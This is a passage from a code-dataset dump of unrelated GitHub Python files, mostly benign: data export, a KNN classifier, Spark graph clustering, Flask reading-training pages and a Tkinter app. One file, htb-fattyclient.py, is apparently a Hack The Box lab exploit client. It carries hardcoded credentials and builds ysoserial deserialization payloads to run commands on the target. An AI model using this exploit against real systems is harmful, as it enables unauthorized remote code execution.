ID', 'Type', 'Info',\n 'Strength'))\n for log in logs:\n try:\n longname = log.sig_type.longname\n except:\n longname = ''\n csv.writerow((log.user.username, log.time.strftime('%Y-%m-%d %H:%M'),\n log.system.name, log.sigid, longname, \n log.info, log.strength))\n return response\n \n elif format == 'xml':\n return render(request, 'scanners.xml', {'logs': logs},\n content_type='application/xml')\n","repo_name":"joshuablake/euni-wspace","sub_path":"euniwspace/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31760683367","text":"import csv\nimport logging\n\n\ndef init_csv(file_name):\n \"\"\"\n Writes header to csv\n \"\"\"\n header = [\"VS Name\", \"VS FQDN\", \"Pool Member Hosts\"]\n\n with open(file_name, \"w\", newline=\"\") as file:\n writer = csv.writer(file)\n\n # Write header row\n writer.writerow(header)\n\n file.close()\n\n\ndef append_csv(file_name, data):\n \"\"\"\n Writes data to a CSV file.\n \"\"\"\n\n logging.debug(f\"input: {data}\")\n\n with open(file_name, \"a\", newline=\"\") as file:\n writer = csv.writer(file)\n\n # Write rows\n writer.writerow(data)\n\n file.close()\n","repo_name":"ensec/f5-export","sub_path":"f5_export/utils/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10421405646","text":"import numpy as np\nimport os, sys\n\n\"\"\"\n程序主要功能: 使用KNN方法解决海伦小姐的约会预测(改进约会网站的配对效果)。\n数据集介绍: \n数据集产生的由来是这样的, 说海伦小姐收集约会的数据已经有一段时间了,她和不同的人约了1000次会之后(震惊脸!),收集了1000条数据\n整个数据集分为四列, 前三列分别为与她约会男士的特征, 最后一列为标签(海伦小姐是否喜欢)\n每列所表示的特征为: 每年获得的飞行常客里程数 / 玩游戏视频所消耗时间百分比 / 每周消费的冰淇淋升数 / 海伦小姐是否喜欢\n其中第四列为标签列, 可以有三种取值(didntLike(不喜欢的人) / smallDoses(魅力一般的人) / largeDoses(极具魅力的人))\n\n使用常规的KNN方法根据三个特征预测样本点所代表的人是否是海伦喜欢的人。\n\"\"\"\n\ndef loadDataSet(dataset_route):\n \"\"\"\n 加载训练集合\n :param dataset_route: 训练集合路径\n :return: Feature_Matrix: 特征矩阵 Y_Matrix: 标签矩阵\n \"\"\"\n if not os.path.exists(dataset_route):\n raise Exception(\"error! not found the dataset file route: %s\" % (dataset_route))\n filein = open(dataset_route, \"r\", encoding=\"utf-8\")\n memory_lines = filein.readlines()\n line = memory_lines[0]\n feature_num = len(line.strip().split(\"\\t\")) - 1\n filein.close()\n\n line_num = len(memory_lines)\n print(\"Read DataSet Successful! DataSet Size: %d, Feature Num: %d\" % (line_num, feature_num))\n feature_matrix, label_matrix = list(), list()\n for idx, line in enumerate(memory_lines):\n line = line.strip()\n line_ext = line.split(\"\\t\")\n feature_matrix.append(line_ext[:-1])\n if line_ext[-1] == \"didntLike\": label_matrix.append(1)\n if line_ext[-1] == \"smallDoses\": label_matrix.append(2)\n if line_ext[-1] == \"largeDoses\": label_matrix.append(3)\n feature_matrix = np.array(feature_matrix).astype(np.float)\n label_matrix = np.array(label_matrix)\n return feature_matrix, label_matrix\n\ndef feature_normlization(dataSet):\n \"\"\"\n 特征归一化,在KNN分类算法过程中,若不进行特征值归一化,则容易导致若某个属性的特征值与其它特征值差异较大\n 主要造成的影响: 1) 特征值的取值范围较大往往会极大地增大两个样本间的距离度量结果\n 2) 特征之间的值差异较大, 造成梯度下降速度变慢\n\n 归一化方法: x = (x - minValue) / (maxValue - minValue) -> [0, 1]\n :param dataSet: 特征矩阵\n :return: 经过归一化的特征矩阵\n \"\"\"\n min_vals = dataSet.min(0)\n max_vals = dataSet.max(0)\n\n ranges = max_vals - min_vals\n norm_Matrix = np.zeros(np.shape(dataSet))\n rows = dataSet.shape[0]\n # np.tile() 方法可以实现矩阵的平铺, 第一个参数为平铺操作的基准数据, 后面第一个参数为沿着Y轴平铺的倍数, 第二个参数为沿着X轴平铺的倍数\n norm_Matrix = dataSet - np.tile(min_vals, (rows, 1))\n norm_Matrix = norm_Matrix / np.tile(ranges, (rows, 1))\n return norm_Matrix, ranges, min_vals\n\ndef split_train_test(X_Matrix, Y_Matrix, ratio):\n \"\"\"\n 交叉验证切分函数, 将特征矩阵和标签矩阵按照一定比例进行切分\n 一部分作为训练集, 另一部分作为测试集\n :param X_Matrix: 待切分的特征矩阵\n :param Y_Matrix: 待切分的标签矩阵\n :param ratio: 切分比例\n :return: X_Train: 训练特征矩阵 X_Valid: 测试特征矩阵 Y_Train: 训练标签矩阵 Y_Valid: 测试标签矩阵\n \"\"\"\n X_rows = X_Matrix.shape[0]\n train_rows = np.int(X_rows * ratio)\n X_Train = X_Matrix[:train_rows]\n Y_Train = Y_Matrix[:train_rows]\n X_Valid = X_Matrix[train_rows:]\n Y_Valid = Y_Matrix[train_rows:]\n return X_Train, X_Valid, Y_Train, Y_Valid\n\ndef sample_kNN_Classifier(TestX_Matrix, TrainX_Matrix, TrainY_Matrix, K):\n \"\"\"\n 对待分类的测试集执行KNN分类, 距离度量采用欧式距离来完成.\n :param TestX_Matrix: 测试集特征矩阵\n :param TrainX_Matrix: 训练集特征矩阵\n :param TrainY_Matrix: 训练集标签矩阵(最终根据找到的最近的K个样本的分类, 执行加权多数表决的方式作为最终分类结果)\n :param K: 设置每次预测选定最近的多少个点.\n :return: 返回分类结果\n \"\"\"\n print(\"TrainX_Matrix Shape: {}\".format(TrainX_Matrix.shape))\n print(\"TestX_Matrix Shape: {}\".format(TestX_Matrix.shape))\n distance = np.sqrt(np.sum((TrainX_Matrix - TestX_Matrix)**2, axis=1))\n ind = np.argsort(distance)\n class_count = {}\n for idx in range(K):\n vote = TrainY_Matrix[ind[idx]]\n class_count[vote] = class_count.get(vote, 0) + 1\n class_count = sorted(class_count.items(), key=lambda item:item[1], reverse=True)\n return class_count[0][0]\n\nX_Matrix, Y_Matrix = loadDataSet(\"./dataset/datingTestSet.txt\")\nxNorm_Matrix, Range, min_vals = feature_normlization(X_Matrix)\nX_train, X_valid, Y_train, Y_valid = split_train_test(X_Matrix, Y_Matrix, 0.8)\nprint(\"x_train: \" + str(X_train.shape))\nprint(\"x_valid: \" + str(X_valid.shape))\nprint(\"y_train: \" + str(Y_train.shape))\nprint(\"y_valid: \" + str(Y_valid.shape))\nlines = int(X_valid.shape[0])\naccurate = 0\nfor idx in range(lines):\n class_result = sample_kNN_Classifier(X_train, X_valid[idx, :], Y_train, K=10)\n accurate += int(Y_valid[idx] == class_result)\nacc = accurate / len(X_valid) * 100.0\nprint(str(acc) + \"%\")","repo_name":"Niutranser-Li/Machine-Learning-Algorithm","sub_path":"K近邻模型(KNN)/general_knn_hall.py","file_name":"general_knn_hall.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"16423147990","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\") as f:\n readme = f.read()\n\nsetup(\n name=\"internet-curator\",\n version=\"0.0.1\",\n description=\"Internet curator\",\n long_description=readme,\n author=\"Rolv-Arild Braaten, Aksel Hjerpbakk\",\n author_email=\"rolv.braaten@nb.no, aksel.hjerpbakk@nb.no\",\n url=\"https://github.com/Rolv-Arild/nb-internet-curator\",\n packages=find_packages(include=\"src\")\n)\n","repo_name":"Rolv-Arild/nb-internet-curator","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38132394869","text":"from typing import List\n\n\nclass Solution:\n def maxIncreaseKeepingSkyline(self, grid: List[List[int]]) -> int:\n order = len(grid)\n trans_grid = [[grid[j][i] for j in range(order) ] for i in range(order)]\n skyline_h = [max(i) for i in grid]\n skyline_v = [max(i) for i in trans_grid]\n increase = 0\n for i in range(order):\n for j in range(order):\n increase += min(skyline_h[i], skyline_v[j]) - grid[i][j]\n return increase\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n grid = [[3, 0, 8, 4], [2, 4, 5, 7], [9, 2, 6, 3], [0, 3, 1, 0]]\n print(sol.maxIncreaseKeepingSkyline(grid))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc500+/lc807/MaxIncrease.py","file_name":"MaxIncrease.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24935989236","text":"def movie_organizer(*info):\n movies = {}\n for movie_info in info:\n name, genre = movie_info[0], movie_info[1]\n\n if genre not in movies:\n movies[genre] = []\n movies[genre].append(name)\n\n result = []\n for genre_content in sorted(movies.items(), key=lambda x: (-len(x[1]), x[0])):\n result.append(f\"{genre_content[0]} - {len(genre_content[1])}\")\n for movie in sorted(genre_content[1]):\n result.append(f\"* {movie}\")\n\n return \"\\n\".join(result)\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exams/April 2023/movie_organizer.py","file_name":"movie_organizer.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27590865908","text":"from bs4 import BeautifulSoup\nimport sys\nimport os\n\nsoup = BeautifulSoup(open(sys.argv[1]), \"html5lib\")\nlis = soup.html.body.find_all(\"li\",recursive=False)\n\ni=0\nfor li in lis:\n if i % 100==0:\n aa = li.find_all('a')\n if len(aa)==1:\n path = li.a['href']\n filename, ext = os.path.splitext(path)\n folder_name = filename.replace('./','')\n code_path = path.replace('./',sys.argv[2])\n desc = li.text \n #print(code_path,ext,folder_name)\n #print(desc)\n print('mkdir',folder_name)\n print('cd',folder_name)\n print('wget',code_path)\n if ext=='.zip':\n print('unzip',path)\n print('rm',path)\n elif ext=='.gz':\n print('gunzip',path)\n print('git init')\n print('git add *')\n print('git commit -m\"first commit\"')\n print('github-linguist > risultato.txt')\n print('cd ..')\n i=i+1\n\n\n","repo_name":"alessandro-gentilini/Na6-P6-O18","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28247320055","text":"import pyspark\nimport sys\nimport re\nimport time\nimport math as ma\nimport csv\nimport os\nfrom itertools import combinations as comb\nfrom collections import defaultdict,Counter\nfrom functools import reduce\nfrom pyspark.sql import SparkSession, SQLContext, Row\nfrom pyspark.sql.types import StringType,StructType,StructField\nfrom graphframes import GraphFrame as GF\n\nimport time\n\nos.environ[\"PYSPARK_SUBMIT_ARGS\"] = (\"--packages graphframes:graphframes:0.6.0-spark2.3-s_2.11\")\n\nstart=time.time()\n\nconfiguration=pyspark.SparkConf().setAppName('task1').setMaster('local[3]')\n\nsci=pyspark.SparkContext(conf=configuration)\n\nspark=SQLContext(sci)\n\nsci.setLogLevel(\"ERROR\")\nsci.setLogLevel(\"OFF\")\n\n\nub_rdd=sci.textFile(sys.argv[2])\n\nubrd=ub_rdd.map(lambda x : tuple(x.split(\",\")))\n\nhead=ubrd.take(1)[0]\nubr=ubrd.filter(lambda x : x!=head)\n\nuids=ubr.map(lambda x : x[0]).distinct().sortBy(lambda x : x).collect()\n\nuser_bus=ubr.groupByKey().map(lambda x : (x[0],list(set(x[1])))).collectAsMap()\n\nuser_pairs=list(comb(uids,2))\n\nnodes=[]\ndirected_edges=[]\nthreshold=int(sys.argv[1])\nfor data in user_pairs:\n x=data[0]\n y=data[1]\n \n if(len(set(user_bus[x]) & set(user_bus[y]))>=threshold):\n nodes.append((x,))\n nodes.append((y,))\n directed_edges.append((x,y))\n directed_edges.append((y,x))\n \nnodes=list(set(nodes))\n#sch=StructType([StructField('vertices',StringType(),True)])\nnodes_df=spark.createDataFrame(nodes,[\"id\"]) \nedges_df=spark.createDataFrame(directed_edges,[\"src\",\"dst\"])\n\n\nnumber_iterations=5\ng=GF(nodes_df,edges_df)\ngraph=g.labelPropagation(maxIter=number_iterations)\n\ng_rdd=graph.rdd\n\ngrdd=g_rdd.map(lambda x : (x[1],x[0])).groupByKey().map(lambda x : sorted(list(x[1]))).sortBy(lambda x : (len(x),x[0]))\n\nfinal_data=grdd.collect()\n\nfile = open(sys.argv[3],\"w\");\n\nfor i in final_data[0:-1]:\n file.write(str(i)[1:-1])\n file.write(\"\\n\");\nfile.write(str(final_data[-1])[1:-1]) \n \nfile.close() \n\nend=time.time()\n\nprint(end-start)\n\n\n\n\n","repo_name":"sanketh1691/Data-Mining","sub_path":"Girvan Newman/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74716445927","text":"# Realizar un programa que calcule y muestre la suma de los múltiplos\n# de 5 comprendidos entre dos valores A y B. El programa no permitirá\n# introducir valores negativos para A y B y verificará que A es menor\n# que B. Si A es mayor que B, se deben intercambiar los valores.\n\nwhile True:\n a = int(input(\"Introduce un numero entero positivo:\\n\"))\n b = int(input(\"Introduce otro numero entero positivo:\\n\"))\n if (a >= 0 and b >= 0):\n break\n else:\n print(\"Se introdujo un valor negativo. Reintentar!\\n\")\n\n#print(\"test 1: a vale \", a, \" y b vale \", b)\n\nif (a > b):\n (a, b) = (b, a) #intercambia valores!\n\n#print(\"test 2: a vale \", a, \" y b vale \", b)\nprint(\"\\n\", end=\"\")\n\ncontador = acumulador = 0\nfor i in range(a, b+1, 1):\n if (i%5 == 0):\n print(f\"{i} es multiplo de 5\")\n acumulador = acumulador + i\n contador += 1\n\nprint(f\"\\nLa suma de los {contador} multiplos de 5 comprendidos entre\"\n f\" {a} y {b} vale {acumulador}\")\n","repo_name":"AlexisRmnk/practicaInformatorio2022","sub_path":"prog_web/01_python/practicas_01_informatorio/ejercicios_complementarios/02_repetitivas/ej07.py","file_name":"ej07.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21169593918","text":"from flask import Blueprint, render_template, abort, flash, request, Markup, redirect, url_for, request, session\nfrom wrst.database import db\nfrom wrst.database.models import User, Relationship\nimport time\nfrom wrst.forms.wrst_forms import EntityEntityForm, TaxonomyForm, ComponentForm, SpatialForm, FunctionalForm, FinalSubmitForm, TextInputForm\nfrom wrst.forms.instruction_forms import InstructionForm\nfrom wrst.logic.decorators import login_required\nfrom wrst.logic.experiment import ProlificExperiment\n\nreading_training_routes = Blueprint('reading_training_routes', __name__)\n\n@reading_training_routes.route('/reading_training_1', methods=['GET', 'POST'])\n@login_required\ndef reading_training_1():\n\n form = InstructionForm(request.form)\n header = \"Reading Strategies Training\"\n content_items = Markup(\n \"\"\"

\n Before you begin reading, think about your goals. What are you trying to achieve by reading a certain text? \n For example, are you trying to understand a topic in depth, memorize concepts for an exam, or get a general \n idea of a subject you’re interested in? Knowing your goals will help you focus your attention and effort.\n

\n \"\"\"\n )\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_2')\n )\n\n@reading_training_routes.route('/reading_training_2', methods=['GET', 'POST'])\n@login_required\ndef reading_training_2():\n\n form = InstructionForm(request.form)\n header = \"Reading Strategies Training\"\n content_items = Markup(\n \"\"\"

\n Next, consider how using reading strategies can be personally useful to you. Many students do not automatically\n apply reading strategies, but certain strategies can be very useful. This particular study will only involve\n one text, but you can apply reading strategies to anything else you read in your life, which will help you\n learn faster and retain your knowledge longer. You will be more likely to retain these reading strategies if\n you believe they are useful.\n

\n \"\"\"\n )\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_before_you_start')\n )\n\n\n@reading_training_routes.route('/reading_training_before_you_start', methods=['GET', 'POST'])\n@login_required\ndef reading_training_before_you_start():\n\n form = InstructionForm(request.form)\n header = \"Before You Start Reading\"\n content_items = Markup(\n \"\"\"

\n First (before you begin reading the text fully), use the preview strategy to get the “big picture” of the topic \n of the reading assignment. Look at headings, subheadings, bolded words, and the first sentences in each section \n to give you clues about what is most important in the text. \n

\n \"\"\"\n )\n images = [\n ['reading_main.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.monitor_understanding')\n )\n\n@reading_training_routes.route('/monitor_understanding', methods=['GET', 'POST'])\n@login_required\ndef monitor_understanding():\n\n form = InstructionForm(request.form)\n header = \"While Reading\"\n content_items = Markup(\n \"\"\"

\n As you read, you should monitor your understanding of the content. Ask yourself how much of the text you are \n comprehending and how much of a knowledge gap you have between what you are reading about and what you already \n knew. Are you making progress toward meeting your original reading goal? If you do not know a word, can you use \n context clues to guess what it means? Having difficulties does not mean you should stop reading! Slow down and \n read more slowly when you reach difficult sections, and pause to think about what you just read. Your reading \n skills will grow as you continue to challenge yourself.\n

\n \"\"\"\n )\n images = [\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n )\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_evaluate')\n )\n\n@reading_training_routes.route('/reading_training_evaluate', methods=['GET', 'POST'])\n@login_required\ndef reading_training_evaluate():\n\n form = InstructionForm(request.form)\n header = \"While Reading\"\n content_items = Markup(\n \"\"\"

\n You should also evaluate the text as you read it. Who wrote the content? Why did they write it, and are there \n multiple purposes the text could serve? What kind of audience did the author intend to read it? What purpose \n does reading it serve you? Answering these questions will help you process and retain the information that you \n read.\n

\n \"\"\"\n )\n images = [\n ['reading_evaluate.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_keyword_strategy')\n )\n\n@reading_training_routes.route('/reading_training_keyword_strategy', methods=['GET', 'POST'])\n@login_required\ndef reading_training_keyword_strategy():\n\n form = InstructionForm(request.form)\n header = \"While Reading\"\n content_items = Markup(\n \"\"\"

\n Use the keyword strategy to mentally assign a \"keyword\" to each paragraph or section of text after \n you read the section. Try to use a keyword the text actually contains. \n

\n \"\"\"\n )\n images = [\n ['reading_keyword.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_after_reading')\n )\n\n# This route is currently deprecated but leaving in here for now in case we bring it back . . . .\n@reading_training_routes.route('/reading_training_mental_imagery', methods=['GET', 'POST'])\n@login_required\ndef reading_training_mental_imagery():\n\n form = InstructionForm(request.form)\n header = \"While Reading\"\n content_items = Markup(\n \"\"\"

\n Mental imagery is also a tool that can also be used on its own. Spend time to create a mental image of what you \n are reading, using any figures or photographs included with the text for guides. As you read more and learn \n more details, either expand upon that mental image, or build a second mental image. \n\n

\n \"\"\"\n )\n images = [\n ['reading_mental.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_after_reading')\n )\n\n@reading_training_routes.route('/reading_training_after_reading', methods=['GET', 'POST'])\n@login_required\ndef reading_training_after_reading():\n\n form = InstructionForm(request.form)\n header = \"After Reading\"\n content_items = Markup(\n \"\"\"

\n In some cases, re-reading is a useful strategy. You do not need to re-read the entire text. Re-reading \n is most effective when you focus on the sections you struggled with the most. Go slowly and pause if you need \n to as you re-read difficult passages.\n

\n \"\"\"\n )\n images = [\n ['reading_after.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_maximizing_retention')\n )\n\n@reading_training_routes.route('/reading_training_maximizing_retention', methods=['GET', 'POST'])\n@login_required\ndef reading_training_maximizing_retention():\n\n form = InstructionForm(request.form)\n header = \"Maximizing Your Retention\"\n content_items = Markup(\n \"\"\"

\n Overall, reading to maximize your retention should involve some effort. By paying attention to not \n only what you are reading but how you are reading, and coming up with strategies like \n assigning keywords to paragraphs, you will be building a deeper understanding of the topic. The deeper you \n understand something, the better you will retain that information long-term, and the better prepared you \n will be to be tested on it later.\n

\n \"\"\"\n )\n images = [\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n )\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('instruction_routes.generic_reroute')\n )\n","repo_name":"openstax/research-wrst","sub_path":"wrst/routes/reading_training_routes.py","file_name":"reading_training_routes.py","file_ext":"py","file_size_in_byte":12145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30469868105","text":"import socket\nimport ssl\nimport hashlib\nimport time\nimport struct\nfrom tqdm import tqdm\nimport os\nimport base64\n\nhostname = '10.10.10.174'\nLOGIN = 65281\nLOGOFF = 4919\nACTION = 65433\nhost_port = 1338\n\ncontext = ssl._create_unverified_context()\n\n\ndef header():\n print(\"\"\"\\033[1m\\033[91m \n ,... \n .d' \"\" mm mm \n dM` MM MM \n mMMmm ,6\"Yb.mmMMmm mmMMmm `7M' `MF'\n MM 8) MM MM MM VA ,V \n MM ,pm9MM MM MM VA ,V \n MM 8M MM MM MM VVV \n.JMML.`Moo9^Yo.`Mbmo `Mbmo ,V \n ,V \n \\033[92mClient by \\033[93m[tn3k] \\033[91mOOb\\033[m \n \n\"\"\")\n\n\ndef help():\n print(\"\"\"Commands with 'A' require admin access\n\t * help - Show this message\n\t * exit - Close\n\t * files - List files in directory\n\t * open - Open file in directory\n\t * whoami - Show name and role\n\t * ping - Pong!\n\t A pwn - Executes command on target machine with ysoserial\n\t A changePW - Deserialize base64\n\t A uname - Run uname\n\t A users - List /home/\n\t A ipconfig - Run ifconfig\n\t A netstat - Run netstat\"\"\")\n\n\ndef timestamp():\n return int(time.time()).to_bytes(4, 'big')\n\n\ndef int_bytes(val):\n return val.to_bytes(4, 'big')\n\n\ndef hash_sha256(message, hexchar=False):\n m = hashlib.sha256()\n m.update(message)\n if hexchar:\n return m.hexdigest().upper()\n else:\n return m.digest()\n\n\ndef sign(message, sessid):\n return hash_sha256(message + \"clarabibi2019!\".encode() + sessid)\n\n\ndef message(messageType, message, sessionid):\n messageType = int_bytes(messageType)\n times = timestamp()\n length = len(message).to_bytes(4, 'big')\n signature = sign(messageType + times + sessionid + message, sessionid)\n ret = messageType\n ret += times\n ret += sessionid\n ret += signature\n ret += length\n ret += message\n return ret\n\n\ndef generatePwn(cmd):\n os.system('java -jar ysoserial.jar CommonsCollections5 \"{0}\" > exploit.ser'.format(cmd))\n with open('exploit.ser', 'rb') as fi: exploit = fi.read()\n return base64.b64encode(exploit)\n\n\ndef action(command):\n payload = []\n cmd = command[0]\n args = command[1:]\n num = len(command) - 1\n if cmd == 'pwn':\n cmd = 'changePW'\n args = [generatePwn(' '.join(args))]\n args[0] = args[0].decode()\n num = 1\n\n payload.append(int_bytes(len(cmd)))\n payload.append(cmd.encode())\n payload.append(int_bytes(num))\n if args != []:\n for arg in args:\n payload.append(int_bytes(len(arg)))\n payload.append(arg.encode())\n return b''.join(payload)\n\n\ndef messagerecv(message):\n size = message[173:177]\n size = struct.unpack('>i', size)[0]\n return message[-size:].decode()\n\n\ndef filerecv(message, header=False):\n if header:\n size = message[173:177]\n size = int(struct.unpack('>i', size)[0])\n return message[-size:], size\n else:\n return message\n\nheader()\nwith socket.create_connection((hostname, host_port)) as sock:\n with context.wrap_socket(sock, server_hostname=hostname) as ssock:\n sessionid = ssock.recv(128)\n username = \"qtc\"\n password = \"clarabibi\"\n hashed = hash_sha256((username + password + \"clarabibimakeseverythingsecure\").encode(), True)\n payload = (username + \":\" + hashed).encode()\n send = message(LOGIN, payload, sessionid)\n print(\"Logging in ...\")\n ssock.send(send)\n print(messagerecv(ssock.recv(2048)))\n print(\"Role: \" + messagerecv(ssock.recv(2048)))\n print('Type help for showing all commands')\n while True:\n command = input(\"[{0}$]: \".format('fatty')).split(\" \")\n if \"exit\" in command:\n exit()\n if \"help\" in command:\n help()\n continue\n send = message(ACTION, action(command), sessionid)\n ssock.send(send)\n if \"open\" in command:\n recv = ssock.recv(177)\n contentlist = []\n content, size = filerecv(recv, True)\n if size < 2048:\n recv = ssock.recv(2048)\n content = filerecv(recv, False).decode()\n print(content)\n else:\n reminder = size % 2048\n iterations = size // 2048\n if reminder:\n iterations += 1\n filename = os.path.basename(command[-1])\n\n for i in tqdm(range(iterations)):\n recv = ssock.recv(2048)\n content = filerecv(recv, False)\n contentlist.append(content)\n print(\"Writing file {0} in disk\".format(filename))\n with open(filename, \"wb\") as f:\n f.write(b''.join(contentlist))\n else:\n recv = messagerecv(ssock.recv(2048))\n if \"User object\" in recv:\n print(\"Payload delivered\")\n else:\n print(recv)\n","repo_name":"puckiestyle/python","sub_path":"htb-fattyclient.py","file_name":"htb-fattyclient.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5489678065","text":"import functools\nimport json\n\nfrom aiohttp import web\n\nfrom config import config\nfrom server.handler import error\nfrom utils import set_logging\nfrom mongo_part import MongoConn\n\n\nclass ServerComponent:\n logger = set_logging(config.SERVER_LOGGER_NAME)\n db = MongoConn(\n config.MONGODB['host'],\n config.MONGODB['port'],\n config.MONGODB['db_name'],\n config.MONGODB['username'],\n config.MONGODB['password'],\n ).db\n\n\nasync def get_json_date(request, need_len=None):\n data = await request.content.read()\n data = data.decode()\n data = json.loads(data)\n ServerComponent.logger.info(data)\n if need_len is None or len(data) == need_len:\n return data\n\n\ndef check_remote(func):\n @functools.wraps(func)\n def wrapper(request):\n return func(request)\n return wrapper\n\n\ndef general_json_data(status, info_dict=None):\n status_data = {'status': status}\n if info_dict is not None:\n info_dict.update(status_data)\n else:\n info_dict = status_data\n return info_dict\n\n\ndef get_data(func):\n @functools.wraps(func)\n async def wrapper(request):\n get_json = await get_json_date(request)\n if get_json is not None:\n return func(get_json)\n else:\n return error.handle_400()\n return wrapper\n\n\ndef no_list():\n emtpy_list = []\n return json.dumps(emtpy_list)\n\n\ndef ok_response():\n res_data = general_json_data('ok')\n return web.json_response(data=res_data)\n","repo_name":"10000ms/link_now","sub_path":"aiohttp_mongdb_unit/server/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42383751675","text":"import tkinter as tk\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom Results import Results\r\nfrom Rot import *\r\nfrom Player import Player\r\nfrom operator import itemgetter\r\nfrom itertools import groupby\r\n\r\nclass Tournament(tk.Frame):\r\n def __init__(self, master=None, First_user_name = StringVar(), Second_user_name = StringVar(), \r\n player_one_id = 0, player_two_id = 0, First_player = 0, Second_player = 0, \r\n first_new_user_points = StringVar(), second_new_user_points = StringVar(), \r\n second_player_id = 0, first_player_id = 0, rounde = StringVar()):\r\n tk.Frame.__init__(self, master)\r\n self.First_user_name = StringVar()\r\n self.Second_user_name = StringVar()\r\n self.player_two_id = player_two_id\r\n self.player_one_id = player_one_id\r\n self.rounde = rounde\r\n self.round = 1\r\n self.player_one_oponents = [] \r\n self.player_two_oponents = []\r\n self.first_new_user_points = first_new_user_points\r\n self.second_new_user_points = second_new_user_points\r\n self.second_player_id = second_player_id\r\n self.first_player_id = first_player_id\r\n self.Tou_frame = ttk.Frame(self, padding=\"6 12 12 12\")\r\n self.Tou_frame.grid(column=0, row=0, sticky=(N, W, E, S))\r\n self.Tou_frame.columnconfigure(0, weight=1)\r\n self.Tou_frame.rowconfigure(0, weight=1)\r\n \r\n self.scrollbar = Scrollbar(self.Tou_frame)\r\n self.players_list = Listbox(self.Tou_frame, width = 55, height = 10, yscrollcommand=self.scrollbar.set, \r\n exportselection=0)\r\n self.scrollbar.config(command=self.players_list.yview)\r\n \r\n self.first_players_list = []\r\n self.second_players_list = []\r\n self.third_unpaired_list = []\r\n self.list_of_players = []\r\n self.pack()\r\n self.createWidgets()\r\n self.updateTable()\r\n\r\n def __del__(self, master=None):\r\n tk.Frame.__init__(self, master)\r\n\r\n def next(self):\r\n root3.deiconify()\r\n app = Results(master=root3)\r\n root2.withdraw()\r\n\r\n def quit(self):\r\n quitProgram()\r\n root.quit() \r\n \r\n def add_points_to_players(self):\r\n print(self.player_one_id)\r\n print(self.player_two_id)\r\n 